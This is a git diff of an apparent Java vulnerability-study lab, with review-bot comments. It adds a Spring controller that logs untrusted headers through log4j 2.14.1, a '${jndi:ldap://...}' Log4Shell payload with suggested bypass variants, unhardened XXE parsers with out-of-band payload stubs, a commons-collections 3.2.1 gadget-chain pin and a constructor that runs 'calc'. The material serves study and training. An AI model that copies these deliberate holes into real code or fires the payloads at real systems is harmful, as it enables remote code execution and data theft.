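Review bot: Sixteen of the 31 lines in `BypassWaf.main` are commented-out payload experiments (`test1`..`test8`), leaving only the `${jndi:%s}` format live, so the class name promises lookup-nesting variants that the code no longer exercises. Either delete the commented lines or make them data, e.g. `String[] payloads = {"${a:\\-b}", "${sys:${a:-j${proto:-a}va.version}}${d:e}", String.format("${jndi:%s}", host)};` followed by `for (String p : payloads) logger.error("{}", p);`, so every variant runs and is documented by its position in the array. The LDAP host is also hard-coded to `127.0.0.1:50389`; reading it from `args` when present keeps the class usable without editing source.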
@@ -0,0 +1,31 @@
+package com.example.spring.controller;
+
+import com.example.App;
+import org.apache.logging.log4j.Level;
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+import org.apache.logging.log4j.core.config.Configurator;
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.ResponseBody;
+
+import javax.servlet.http.HttpServletRequest;
+
+@Controller
+public class IndexController {
+ private static final Logger logger = LogManager.getLogger(IndexController.class);
+
+ @RequestMapping("/")
+ @ResponseBody
+ public String index(@RequestParam(value = "name", defaultValue = "World") String name, HttpServletRequest request) {
+ Configurator.setLevel("com.example.spring.controller.IndexController", Level.DEBUG);
+
+ String referer = request.getHeader("Referer");
+ logger.error("Referer: {}", referer);
+ String header = request.getHeader("User-Agent");
+ logger.error("User-Agent: {}", header);
+// logger.error("Hello, {}", name);
+ return String.format("Hello, %s!", name);
+ }
+}
diff --git a/JNDI/Log4j2/src/main/java/com/example/tmp.java b/JNDI/Log4j2/src/main/java/com/example/tmp.java
new file mode 100644
index 0000000..5d41b57
--- /dev/null
+++ b/JNDI/Log4j2/src/main/java/com/example/tmp.java
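Review bot: `Referer` and `User-Agent` are attacker-controlled and are logged verbatim through log4j-core 2.14.1 (pinned in this commit's pom), which is the Log4Shell sink this lab exists to show, yet `index` carries no marker saying so; put `// INTENTIONALLY VULNERABLE: untrusted headers reach log4j message lookups (CVE-2021-44228)` above the two `logger.error` calls so nobody copies the pattern into real code. `Configurator.setLevel(...)` mutates global logger configuration on every request; hoist it into a `static {}` block or into log4j2.xml. `import com.example.App;` is unused, and `name` is only echoed back, so the commented `logger.error("Hello, {}", name);` should be either restored (it is the more realistic sink, a query parameter) or removed.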
@@ -0,0 +1,21 @@ +package com.example; + +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import javax.naming.InitialContext; +import javax.naming.NamingException; + +public class tmp { + private static final Logger logger = LogManager.getLogger(tmp.class); + + public static void main(String[] args) throws NamingException { +// String url = "ldap://127.0.0.1:50389/7df78d"; +// InitialContext initialContext = new InitialContext(); +// initialContext.lookup(url); + + String message = "${jndi:ldap://127.0.0.1:50389/7df78d}"; + + logger.error("{}", message); + } +} diff --git a/JNDI/Log4j2/src/main/resources/application.yaml b/JNDI/Log4j2/src/main/resources/application.yaml new file mode 100644 index 0000000..ab8fc62 --- /dev/null +++ b/JNDI/Log4j2/src/main/resources/application.yaml @@ -0,0 +1,2 @@ +server: + port: 8005 \ No newline at end of file diff --git a/JNDI/Log4j2/src/main/resources/log4j2.xml b/JNDI/Log4j2/src/main/resources/log4j2.xml new file mode 100644 index 0000000..4daec91 --- /dev/null +++ b/JNDI/Log4j2/src/main/resources/log4j2.xml @@ -0,0 +1,37 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/hessian/dubbo/.gitignore "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.gitignore" similarity index 100% rename from hessian/dubbo/.gitignore rename to "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.gitignore" diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/.gitignore" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/.gitignore" new file mode 100644 index 0000000..35410ca --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/.gitignore" @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml 
diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/encodings.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git a/hessian/dubbo/.idea/misc.xml "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/misc.xml" similarity index 100% rename from hessian/dubbo/.idea/misc.xml rename to "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/misc.xml" diff --git a/hessian/HessianStudy/.idea/vcs.xml "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/vcs.xml" similarity index 100% rename from hessian/HessianStudy/.idea/vcs.xml rename to "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/vcs.xml" diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/pom.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/pom.xml" new file mode 100644 index 0000000..84992b0 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/pom.xml" @@ -0,0 +1,21 @@ + + 4.0.0 + com.test + SSRF + war + 1.0-SNAPSHOT + SSRF Maven Webapp + http://maven.apache.org + + + junit + junit + 3.8.1 + test + + + + SSRF + + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/resources/springmvc.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/resources/springmvc.xml" new file mode 100644 index 0000000..142def2 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/resources/springmvc.xml" @@ -0,0 +1,6 @@ + + + + \ No newline at end of file 
diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/WEB-INF/web.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/WEB-INF/web.xml" new file mode 100644 index 0000000..9f88c1f --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/WEB-INF/web.xml" @@ -0,0 +1,7 @@ + + + + Archetype Created Web Application + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/index.jsp" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/index.jsp" new file mode 100644 index 0000000..c38169b --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/index.jsp" @@ -0,0 +1,5 @@ + + +

Hello World!

+ + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest1.jsp" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest1.jsp" new file mode 100644 index 0000000..513ef52 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest1.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/10/28 + Time: 10:30 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest2.jsp" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest2.jsp" new file mode 100644 index 0000000..148ba39 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest2.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/10/28 + Time: 10:37 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest3.jsp" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest3.jsp" new file mode 100644 index 0000000..bf9ba3a --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest3.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/10/28 + Time: 10:38 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + 
diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/1.dtd" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/1.dtd" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/2.dtd" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/2.dtd" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dns.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dns.xml" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.dtd" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.dtd" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.xml" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.dtd" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.dtd" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.xml" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/src/main/java/com/test/local/XXEVuln.java" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/src/main/java/com/test/local/XXEVuln.java" new file mode 100644 index 0000000..40a5cec --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/src/main/java/com/test/local/XXEVuln.java" 
@@ -0,0 +1,127 @@ +package com.test.local; + +import org.apache.commons.digester3.Digester; +import org.dom4j.DocumentException; +import org.dom4j.io.SAXReader; +import org.jdom2.JDOMException; +import org.jdom2.input.SAXBuilder; +import org.w3c.dom.Document; +import org.w3c.dom.Node; +import org.w3c.dom.NodeList; +import org.xml.sax.InputSource; +import org.xml.sax.SAXException; +import org.xml.sax.XMLReader; +import org.xml.sax.helpers.DefaultHandler; +import org.xml.sax.helpers.XMLReaderFactory; + +import javax.xml.parsers.*; +import java.io.IOException; +import java.io.InputStream; +import java.io.StringReader; + +public class DocBuilder { + public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException { + String xml1 = "" + + "]>" + + "" + + "&xxe;" + + "webgoat" + + ""; + + // 报错抛出数据 + String xml2 = "\n" + + "\n" + + "\n" + + "%remote;%int;%send;\n" + + "]>"; + + //DNS探测 + String xml3 = "\n" + + "\n" + + "\n" + + "%remote;\n" + + "]>"; + + // 通过CDATA,读取包含特殊符号的文本 + String xml4 = " \n" + + " \n" + + " \n" + + "\"> \n" + + " \n" + + "%dtd; ]> \n" + + "\n" + + "&all;"; + + docBuilder(xml4); + } + + public static void docBuilder(String xml) throws ParserConfigurationException, IOException, SAXException { + InputStream inputStream = new java.io.ByteArrayInputStream(xml.getBytes()); + + DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); + DocumentBuilder builder = factory.newDocumentBuilder(); + + // 漏洞:未禁用外部实体 + Document doc = builder.parse(inputStream); + + // 遍历xml节点name和value + StringBuffer buf = new StringBuffer(); + NodeList rootNodeList = doc.getChildNodes(); + for (int i = 0; i < rootNodeList.getLength(); i++) { + Node rootNode = rootNodeList.item(i); + NodeList child = rootNode.getChildNodes(); + for (int j = 0; j < child.getLength(); j++) { + Node node = child.item(j); + buf.append(node.getNodeName() + ": " + node.getTextContent() + "\n"); + } + } + System.out.println(buf.toString()); +// 
System.out.println(doc); + System.out.println("Document parsed successfully"); + } + + public static void xmlReader(String xml) throws ParserConfigurationException, IOException, SAXException { + XMLReader xmlReader = XMLReaderFactory.createXMLReader(); + xmlReader.parse(new InputSource(new StringReader(xml))); + } + + public static void SAXBuilder(String xml) throws ParserConfigurationException, IOException, SAXException, JDOMException { + SAXBuilder builder = new SAXBuilder(); + // org.jdom2.Document document + builder.build(new InputSource(new StringReader(xml))); // cause xxe + } + + public static void SAXReader(String xml) throws DocumentException { + SAXReader reader = new SAXReader(); + // org.dom4j.Document document + reader.read(new InputSource(new StringReader(xml))); // cause xxe + } + + public static void SAXParser(String xml) throws ParserConfigurationException, SAXException, IOException { + SAXParserFactory spf = SAXParserFactory.newInstance(); + SAXParser parser = spf.newSAXParser(); + parser.parse(new InputSource(new StringReader(xml)), new DefaultHandler()); + } + + public static void Digester(String xml) throws IOException, SAXException { + Digester digester = new Digester(); + Object parse = digester.parse(new StringReader(xml));// parse xml + } + + public static void docBuilderXinclude(String xml) throws ParserConfigurationException, IOException, SAXException { + DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); + dbf.setXIncludeAware(true); // 支持XInclude + dbf.setNamespaceAware(true); // 支持XInclude + DocumentBuilder db = dbf.newDocumentBuilder(); + StringReader sr = new StringReader(xml); + InputSource is = new InputSource(sr); + Document document = db.parse(is); // parse xml + + NodeList rootNodeList = document.getChildNodes(); + } + + +} 
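Review bot: The class declared here is `public class DocBuilder`, but the file is `XXEVuln.java`, and javac rejects a public class whose name does not match its file, so nothing in this hunk compiles until the class is renamed to `XXEVuln` or the file to `DocBuilder.java`. `xml.getBytes()` in `docBuilder` uses the platform default charset; `xml.getBytes(StandardCharsets.UTF_8)` (with the `java.nio.charset` import) makes the parse of these payloads deterministic across machines. Every parser in the file is the deliberately unhardened form, so a one-line comment on `DocumentBuilderFactory.newInstance()` naming the mitigation, `// secure form: factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);`, puts the fix beside the bug for readers. `xmlReader`, `SAXBuilder`, `SAXReader`, `SAXParser`, `Digester` and `docBuilderXinclude` are never called from `main`; fine for a lab, but a comment saying they are alternative sinks to swap in would help.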
diff --git "a/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/dser/Main.java" "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/deser/Main.java" similarity index 100% rename from "Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/dser/Main.java" rename to "Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/deser/Main.java" diff --git "a/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Baka.java" "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Baka.java" new file mode 100644 index 0000000..63aed70 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Baka.java" 
@@ -0,0 +1,62 @@
+package com.test.pojo;
+
+public class Baka extends Object{
+ public String name;
+ protected int gender;
+ private int age;
+
+ public Baka() {
+ System.out.println("Baka⑨");
+ }
+
+ public Baka(String name, int gender, int age) {
+ this.name = name;
+ this.gender = gender;
+ this.age = age;
+ System.out.println(name + " " + gender + " " + age);
+ }
+
+ public static void sit(String name) {
+ System.out.println("sit " + name);
+ }
+
+ public void hello(String name) {
+ System.out.println("hello " + name);
+ }
+
+ protected void hug(String name) {
+ System.out.println("hug " + name);
+ }
+
+ private void kiss(String name) {
+ System.out.println("kiss " + name);
+ }
+
+ private void kiss(String alias, String name) {
+ System.out.println("kiss " + alias + "(" + name + ")");
+ }
+
+ public String getName() {
+ return name;
+ }
+
+ public void setName(String name) {
+ this.name = name;
+ }
+
+ public int getGender() {
+ return gender;
+ }
+
+ public void setGender(int gender) {
+ this.gender = gender;
+ }
+
+ public int getAge() {
+ return age;
+ }
+
+ public void setAge(int age) {
+ this.age = age;
+ }
+}
diff --git "a/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Student.java" "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Student.java"
new file mode 100644
index 0000000..e8df6ba
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Student.java"
@@ -0,0 +1,4 @@
+package pojo;
+
+public class Student {
+}
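Review bot: `Baka.java` lives in `src/main/java/pojo/` but declares `package com.test.pojo;`, while `Student.java` in the same directory (same hunk line) declares `package pojo;`, so the two classes land in different packages and the declaration no longer matches the Maven source layout; change the first line to `package pojo;` or move the file under `com/test/pojo/`. `extends Object` is implicit and can be dropped. If this class is meant to be the object serialised by the `ser`/`deser` mains in this module, it also needs `implements java.io.Serializable`, which it does not have — whether that is intended cannot be told from the hunk.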
diff --git "a/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/ser/Ser01.java" "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/ser/Ser01.java" new file mode 100644 index 0000000..db80041 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/ser/Ser01.java" @@ -0,0 +1,4 @@ +package ser; + +public class Ser01 { +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.gitignore" new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.gitignore" @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file 
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/.gitignore" new file mode 100644 index 0000000..35410ca --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/.gitignore" @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/misc.xml" new file mode 100644 index 0000000..8345e46 
--- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/misc.xml" @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/vcs.xml" new file mode 100644 index 0000000..c2365ab --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/vcs.xml" @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Person.class" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Person.class" new file mode 100644 index 0000000..a4adc65 Binary files /dev/null and "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Person.class" differ 
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Student.class" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Student.class" new file mode 100644 index 0000000..94ba715 Binary files /dev/null and "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Student.class" differ diff --git a/JNDI/JNDI_vul/server/pom.xml "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/pom.xml" similarity index 61% rename from JNDI/JNDI_vul/server/pom.xml rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/pom.xml" index 1634d2a..8f2e373 100644 --- a/JNDI/JNDI_vul/server/pom.xml +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/pom.xml" @@ -3,13 +3,10 @@ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 - - org.example - JNDI - 1.0-SNAPSHOT - - server + com.test + ClassLoadStudy + 1.0-SNAPSHOT 8 @@ -17,4 +14,12 @@ UTF-8 + + + commons-collections + commons-collections + 3.2.1 + + + \ No newline at end of file 
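Review bot: The added `commons-collections:commons-collections:3.2.1` is the release immediately before 3.2.2, which introduced the `org.apache.commons.collections.enableUnsafeSerialization` guard against the `InvokerTransformer` deserialization gadget chain, so this pin is exactly what makes the well-known CommonsCollections gadgets usable in this module; presumably deliberate, but mark it `<!-- intentionally vulnerable: CC 3.2.1 gadget-chain target; do not copy -->` so it is not mistaken for a stale version the next time dependencies are audited. Element names are stripped in this view, so the surrounding markup is inferred from the groupId/artifactId/version text.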
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java"
new file mode 100644
index 0000000..e20de74
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java"
@@ -0,0 +1,19 @@
+package com.test.pojo;
+
+public class Baka {
+ public String name;
+
+ static {
+ System.out.println("static block");
+ }
+
+ public Baka() {
+ System.out.println("no-arg constructor");
+ }
+
+ public Baka(String name) {
+ this.name = name;
+ System.out.println("name constructor");
+ }
+
+}
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Person.java"
new file mode 100644
index 0000000..287b878
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Person.java"
@@ -0,0 +1,18 @@
+package com.test.pojo;
+
+import java.io.IOException;
+
+public class Person {
+ public Person() {
+ try {
+ System.out.println("Person non-args constructor");
+ Runtime.getRuntime().exec("calc");
+ } catch (IOException e) {
+ throw new RuntimeException(e);
+ }
+ }
+
+ static {
+ System.out.println("Person static");
+ }
+}
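Review bot: `Person`'s constructor discards the `Process` returned by `Runtime.getRuntime().exec("calc")`, so the demo cannot wait on or inspect what it launched, and nothing in the file says that merely constructing or initializing the class has that side effect. A class Javadoc makes the fixture's contract explicit, e.g. `/** Lab fixture: static initialization prints; construction prints and spawns a process. Only load from the ClassLoadStudy exercises. */`. `Student.java` in ReflectionStudy has the same shape and needs the same note.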
